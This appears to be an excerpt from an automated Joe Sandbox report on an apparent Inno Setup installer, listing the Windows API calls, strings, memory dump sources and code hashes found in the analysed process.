                                            • Part of subcall function 00456300: CloseHandle.KERNEL32(00000000), ref: 00456330
                                            • Part of subcall function 00456300: WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045635A
                                            • Part of subcall function 00456300: GetExitCodeProcess.KERNEL32 ref: 0045636A
                                            • Part of subcall function 00456300: CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563B0
                                            • Part of subcall function 00456300: Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563C9
                                            • Part of subcall function 00456300: TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 0045634D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseHandleProcess$ByteCharCodeExitFullMultiNameObjectPathSingleSleepTerminateWaitWide
                                          • String ID: HelperRegisterTypeLibrary: StatusCode invalid$ITypeLib::GetLibAttr$LoadTypeLib$RegisterTypeLib$UnRegisterTypeLib
                                          • API String ID: 3965036325-83444288
                                          • Opcode ID: cf2a3a04fc8b757f2918928d542b7fec9a35e389a630b909b09c684119571e75
                                          • Instruction ID: 7b9cdc252f2b98f7b0b919fb9f5ead86ecc66f3806473bd0b3f3771be5b08ee5
                                          • Opcode Fuzzy Hash: cf2a3a04fc8b757f2918928d542b7fec9a35e389a630b909b09c684119571e75
                                          • Instruction Fuzzy Hash: BF31A230710114ABDB10EBA58952B5EB7A8DB04307F92847BBD05D7393EA3CAE09965D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemMetrics.USER32 ref: 0041BE9D
                                          • GetSystemMetrics.USER32 ref: 0041BEA7
                                          • 72E5AC50.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BEB1
                                          • 72E5AD70.GDI32(00000000,0000000E,00000000,0041BF24,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BED8
                                          • 72E5AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BF24,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BEE5
                                          • 72E5B380.USER32(00000000,00000000,0041BF2B,0000000E,00000000,0041BF24,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BF1E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$B380
                                          • String ID:
                                          • API String ID: 3145338429-0
                                          • Opcode ID: 268c34d798b48d523a2a72084894ca833f9098c92c62758936d7a7a357cc6e81
                                          • Instruction ID: ab95e7bdbdf47fefe5665f381421f791bef747732ba1a7285d8139ec20da3399
                                          • Opcode Fuzzy Hash: 268c34d798b48d523a2a72084894ca833f9098c92c62758936d7a7a357cc6e81
                                          • Instruction Fuzzy Hash: 15215770E40648AFEB00EFA9C842BEEBBB4EF48704F10802AF515B7291D7795940CF69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlEnterCriticalSection.KERNEL32(0048D420,00000000,00401B70), ref: 00401AC5
                                          • LocalFree.KERNEL32(00681DF8,00000000,00401B70), ref: 00401AD7
                                          • VirtualFree.KERNEL32(?,00000000,00008000,00681DF8,00000000,00401B70), ref: 00401AF6
                                          • LocalFree.KERNEL32(0067F9B8,?,00000000,00008000,00681DF8,00000000,00401B70), ref: 00401B35
                                          • RtlLeaveCriticalSection.KERNEL32(0048D420,00401B77), ref: 00401B60
                                          • RtlDeleteCriticalSection.KERNEL32(0048D420,00401B77), ref: 00401B6A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                          • String ID:
                                          • API String ID: 3782394904-0
                                          • Opcode ID: 68d932db4689e114aee9658c5227d6ca8a691041475f589188673913b12cc760
                                          • Instruction ID: 954f68671e0f677be55c5b6586aae97ede79eb7a3530a01ec67f03a117e7fc77
                                          • Opcode Fuzzy Hash: 68d932db4689e114aee9658c5227d6ca8a691041475f589188673913b12cc760
                                          • Instruction Fuzzy Hash: 0011BF70E022445BE715AB699C86F1E37A5A786B0CF44487BF40067AF2D77CB880C76D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetWindowLongA.USER32 ref: 0047365E
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,00465D19), ref: 00473684
                                          • GetWindowLongA.USER32 ref: 00473694
                                          • SetWindowLongA.USER32 ref: 004736B5
                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 004736C9
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 004736E5
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$Long$Show
                                          • String ID:
                                          • API String ID: 3609083571-0
                                          • Opcode ID: d39bea5b712bfdc9735a60e0145ecc3e7a96a44752dd36986865cf0652838775
                                          • Instruction ID: cc5d0bd8627a758d92d1c102103f7bea2d573f558d08472a26e14bce27c5c0cd
                                          • Opcode Fuzzy Hash: d39bea5b712bfdc9735a60e0145ecc3e7a96a44752dd36986865cf0652838775
                                          • Instruction Fuzzy Hash: B00140757412146BD610EF68CD41F2A37D86B0C331F054699B549EB3E2D229D8009B0C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041A7A8: CreateBrushIndirect.GDI32 ref: 0041A813
                                          • UnrealizeObject.GDI32(00000000), ref: 0041B344
                                          • SelectObject.GDI32(?,00000000), ref: 0041B356
                                          • SetBkColor.GDI32(?,00000000), ref: 0041B379
                                          • SetBkMode.GDI32(?,00000002), ref: 0041B384
                                          • SetBkColor.GDI32(?,00000000), ref: 0041B39F
                                          • SetBkMode.GDI32(?,00000001), ref: 0041B3AA
                                            • Part of subcall function 0041A120: GetSysColor.USER32(?), ref: 0041A12A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                          • String ID:
                                          • API String ID: 3527656728-0
                                          • Opcode ID: f29873dfcf61593aa75cb2549b6a9cf3e48997b8b5295c1044d98b88f295631e
                                          • Instruction ID: 77b069976dd3d0630739711c0f042b47a511feb73613b7c2979f61d441d75bd8
                                          • Opcode Fuzzy Hash: f29873dfcf61593aa75cb2549b6a9cf3e48997b8b5295c1044d98b88f295631e
                                          • Instruction Fuzzy Hash: 80F0BB75601500ABDF00FFAADAC6A5B37A89F043097144066B95CEF297CA2DDD608B7A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetClassInfoW.USER32 ref: 0046E06A
                                          • 72E5B5A0.USER32(00000000,000000FC,Function_0006DFC8,00000000,COMBOBOX,?,00000000,0046E1F1,?,00000000,0046E216), ref: 0046E091
                                          • GetACP.KERNEL32(00000000,0046E1F1,?,00000000,0046E216), ref: 0046E0CE
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046E10B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ClassInfoMessageSend
                                          • String ID: COMBOBOX
                                          • API String ID: 1455646776-1136563877
                                          • Opcode ID: ecf6b1b36adab5c0c607c0c5491daa48661cbd09d0af7ffc92b2b2a1d3dd5697
                                          • Instruction ID: bf9fa50a147f2a7a1fd21979d2a4f48488d8ebd37f07552d0d4d7f5ff4337c98
                                          • Opcode Fuzzy Hash: ecf6b1b36adab5c0c607c0c5491daa48661cbd09d0af7ffc92b2b2a1d3dd5697
                                          • Instruction Fuzzy Hash: 0D514E38A00214DFDB10DF66D885A9E77F5EB09314F1181BAE805EB3A2DB34EC41CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • TransactNamedPipe.KERNEL32(00000000,0048DF20,0000000C,0049DF2C,00010010,00000000,00000000,00000000,00456595,?,00000000,004565F5,?,?,00000000,00000000), ref: 00456528
                                            • Part of subcall function 00451E44: GetLastError.KERNEL32(00000000,00451EDC,?,?,00000000,00000000,00000005,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000), ref: 00451E68
                                          Strings
                                          • CallHelper: Response message has wrong size, xrefs: 00456557
                                          • TransactNamedPipe, xrefs: 00456531
                                          • CallHelper: Wrong sequence number, xrefs: 0045656E
                                          • CallHelper: Command did not execute, xrefs: 00456581
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLastNamedPipeTransact
                                          • String ID: CallHelper: Command did not execute$CallHelper: Response message has wrong size$CallHelper: Wrong sequence number$TransactNamedPipe
                                          • API String ID: 1561970684-1127398157
                                          • Opcode ID: ffb694ad1e35bee1aadd5e3062ec2ba92c81d3c57b9e06c8291ffe42f330cbda
                                          • Instruction ID: 2e93eb1e0bdb189b8afc9a6ad78755c4a3fb252293179feebe95d9f813390879
                                          • Opcode Fuzzy Hash: ffb694ad1e35bee1aadd5e3062ec2ba92c81d3c57b9e06c8291ffe42f330cbda
                                          • Instruction Fuzzy Hash: D621A771A44204BFD711DF65EC42B5E77A8E748715FA1483BFE01C7296E778A808DA1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ExitMessageProcess
                                          • String ID: Error$Runtime error at 00000000$`K@
                                          • API String ID: 1220098344-2860380777
                                          • Opcode ID: 46db2382e64b13f836b28f0b4a4f4c7eeae605f1127beaa8ff57c6a4eae7ff20
                                          • Instruction ID: f5843219a1cd4db4f0c045c0a488b172177e128e40d0f46163d998114cd4ebaa
                                          • Opcode Fuzzy Hash: 46db2382e64b13f836b28f0b4a4f4c7eeae605f1127beaa8ff57c6a4eae7ff20
                                          • Instruction Fuzzy Hash: 2F21B270E422418AD712BB79988171E27C1939B35CF04897FE240BB3E2C63C984687AE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • BeginPaint.USER32(00000000,?), ref: 00416D1A
                                          • SaveDC.GDI32(?), ref: 00416D4B
                                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416E0D), ref: 00416DAC
                                          • RestoreDC.GDI32(?,?), ref: 00416DD3
                                          • EndPaint.USER32(00000000,?,00416E14,00000000,00416E0D), ref: 00416E07
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Paint$BeginClipExcludeRectRestoreSave
                                          • String ID:
                                          • API String ID: 3808407030-0
                                          • Opcode ID: 00e150e368ed395aa4cb19d220a76acfea4c7132713746b4edbbefb6b4a93cd9
                                          • Instruction ID: 3f50a158c09fa7d40c74242d7866ae8e121bb2ea373f5648e482b570019b9da3
                                          • Opcode Fuzzy Hash: 00e150e368ed395aa4cb19d220a76acfea4c7132713746b4edbbefb6b4a93cd9
                                          • Instruction Fuzzy Hash: BD414F70A00204AFCB14DBA9D985FAEB7F9EF49304F1641AEE80497362C778DD41CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7390ee9ac16f09bdc99c1280845292df1e4ced5812246f729178c8d7ae4dc2ea
                                          • Instruction ID: b2fcc88294246e7fdf377a3e38791ba580108d4baa7c4e185119fc48081c3c44
                                          • Opcode Fuzzy Hash: 7390ee9ac16f09bdc99c1280845292df1e4ced5812246f729178c8d7ae4dc2ea
                                          • Instruction Fuzzy Hash: DF313EB0614741AFC720DB39C944AA7B7E8AF89724F04891EF9D9C7752C638F880CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004298D0
                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004298FF
                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0042991B
                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 00429946
                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00429964
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 8e5dfd66703d97274265084b8db4141c868f22bca3892edfb9180d7bf1687cd5
                                          • Instruction ID: 47377c1862aa105c286af36649f9a3d734455abbd3099443d1a36276b08c5a1e
                                          • Opcode Fuzzy Hash: 8e5dfd66703d97274265084b8db4141c868f22bca3892edfb9180d7bf1687cd5
                                          • Instruction Fuzzy Hash: D5216DB07407057AE710BBA7DC82F8A76ECEF40715F5045BEB905A7791DAB8AD80861C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemMetrics.USER32 ref: 0041BC92
                                          • GetSystemMetrics.USER32 ref: 0041BC9C
                                          • 72E5AC50.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BCDA
                                          • 72E5A7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BE45,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BD21
                                          • DeleteObject.GDI32(00000000), ref: 0041BD62
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MetricsSystem$DeleteObject
                                          • String ID:
                                          • API String ID: 4263548647-0
                                          • Opcode ID: ebf46c03cac98e224d5af82ce3f50ae7f771ac334da26f83eeff5384ef9d9d29
                                          • Instruction ID: c65bf0c67bf8e5c994f3fd77b84131b0e4b597875354c07c771677eb7b7b2793
                                          • Opcode Fuzzy Hash: ebf46c03cac98e224d5af82ce3f50ae7f771ac334da26f83eeff5384ef9d9d29
                                          • Instruction Fuzzy Hash: BC313274E00608EFDB04DFA5C941AAEB7F5EF48704F1185AAF504A7391D7789E40DB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403E26
                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403E31
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403E44
                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403E4E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403E5D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocString
                                          • String ID:
                                          • API String ID: 262959230-0
                                          • Opcode ID: a1d5a16539d5729e30e1d1df62381961c0ebc6718be827e074fe47fdb24492b9
                                          • Instruction ID: 8553b393521568fe2c41fe67b513b28362bdb8871c566aa6fe10746e1f77f2e9
                                          • Opcode Fuzzy Hash: a1d5a16539d5729e30e1d1df62381961c0ebc6718be827e074fe47fdb24492b9
                                          • Instruction Fuzzy Hash: D6F044613442043AE16035A64C87FA7298CCB41BDAF10057EB708FA2D1D8B99D0442FD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5B410.GDI32(00000000,00000000,00000000), ref: 004144E1
                                          • 72E5B150.GDI32(00000000,00000000,00000000,00000000), ref: 004144E9
                                          • 72E5B410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004144FD
                                          • 72E5B150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414503
                                          • 72E5B380.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041450E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: B150B410$B380
                                          • String ID:
                                          • API String ID: 2237492430-0
                                          • Opcode ID: d4537fdfc788aeebb9a2e69f75dd2e1211b83efa39a5fff194788b356ba8a41d
                                          • Instruction ID: 83d045a3d997561e5c3a0c06dd80eb92e83f219617ccc8c1327c6f1541475871
                                          • Opcode Fuzzy Hash: d4537fdfc788aeebb9a2e69f75dd2e1211b83efa39a5fff194788b356ba8a41d
                                          • Instruction Fuzzy Hash: BD01DF352083806BC200B63E8C45A9F6BDD8FCA714F15446EF088DB282CA79CC018775
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID: GetProcAddress$HelperRegisterServer: StatusCode invalid$LoadLibrary
                                          • API String ID: 1452528299-1321573290
                                          • Opcode ID: 82b3930b3ebbd04eca898e3712e51c71d1ebe08aee199a6e1fecedf9574e4dee
                                          • Instruction ID: 7fc71ba1eee109a84b7e32a822ab3a0f054f86a781db50bf2e0c3a492acbb2a4
                                          • Opcode Fuzzy Hash: 82b3930b3ebbd04eca898e3712e51c71d1ebe08aee199a6e1fecedf9574e4dee
                                          • Instruction Fuzzy Hash: 59F031B06240405BCE10EB69994256A73A4EB843473D3453BAC01D726BDA3CDD0DD71E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041F13C: GetActiveWindow.USER32 ref: 0041F13F
                                            • Part of subcall function 0041F13C: GetCurrentThreadId.KERNEL32 ref: 0041F154
                                            • Part of subcall function 0041F13C: 72E5AC10.USER32(00000000,Function_0001F118), ref: 0041F15A
                                            • Part of subcall function 00423270: GetSystemMetrics.USER32 ref: 00423272
                                          • OffsetRect.USER32(?,?,?), ref: 00424E91
                                          • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424F54
                                          • OffsetRect.USER32(?,?,?), ref: 00424F65
                                            • Part of subcall function 0042362C: GetCurrentThreadId.KERNEL32 ref: 00423641
                                            • Part of subcall function 0042362C: SetWindowsHookExA.USER32 ref: 00423651
                                            • Part of subcall function 0042362C: CreateThread.KERNEL32 ref: 00423675
                                            • Part of subcall function 00424BF4: SetTimer.USER32 ref: 00424C0F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
